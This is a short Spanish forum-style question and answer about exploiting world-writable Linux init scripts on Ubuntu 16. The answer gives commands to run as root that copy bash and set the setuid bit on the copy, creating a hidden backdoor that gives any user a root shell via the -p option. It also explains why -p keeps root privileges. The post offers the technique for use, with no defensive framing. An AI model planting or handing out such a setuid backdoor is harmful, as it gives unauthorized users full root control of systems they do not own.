¿Qué son los scripts de inicio en Linux y cuáles son los pasos para explotar los scripts de inicio si se pueden escribir en todo el mundo?
Apreciaría si se pudiera explicar en base a los siguientes dos archivos como ejemplo en Ubuntu 16:
/etc/init.d/README
/etc/init.d/sudo
Organizar, para ejecutar como root:
cp $(which bash) $(which bash).muhaha
chmod u+s $(which bash).muhaha
Ahora, ejecutar $(which bash).muhaha -p le da root a cualquier usuario. Incluso puedes ejecutar un script como root con $(which bash).muhaha -p /path/to/script .
La opción -p es necesaria porque, de lo contrario, bash detecta que es setuid y elimina los privilegios de root como medida de seguridad.